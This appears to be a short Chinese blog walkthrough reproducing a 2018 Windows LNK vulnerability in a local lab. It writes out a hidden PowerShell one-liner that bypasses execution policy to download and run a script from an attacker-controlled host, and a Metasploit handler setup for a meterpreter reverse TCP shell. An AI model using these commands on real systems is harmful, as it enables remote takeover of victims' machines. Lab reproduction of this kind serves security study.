windows lnk漏洞复现过程

2018-03-29 18:34:37 浏览数 (1)

前言

最近Windows出了一个lnk的漏洞,本着不复现不罢休的原则,自己搭建环境复现了一波,虽然没有这么顺利,但最后还是复现成功,哈哈哈哈,大牛就勿喷了,技术能力有限。复现了好久~~~~

0x01 准备阶段

1、本机IP

2、利用pentestbox生成一个反弹后门,后门保存地址为C盘根目录

3、开启phpstudy环境,将shell.ps1放置解析根目录下。

4、放入我们的恶意脚本

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.102/111.ps1');xx.ps1"

0x02 开启msf

接着开启我们的神器--msf

metasploit做以下相关配置: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST *.*.*.* //本机IP msf exploit(handler) > set LPORT **** //本机监听端口 msf exploit(handler) > run

0x03 填坑

小编复现的时候出现了几个问题,试了好久才解决,大牛勿喷

1、首先一定要攻击机器能运行powershell

2、环境变量加上powershell的路径,否则会一直提示找不到powershell

0x04 最后

2、本次复现全部在本地实验环境中,文章仅供技术交流,如您使用该文章用户非法攻击其他计算机,造成的损失与本作者一概无关,希望各位老铁们能遵纪守法,做一位合格的好市民。

0 人点赞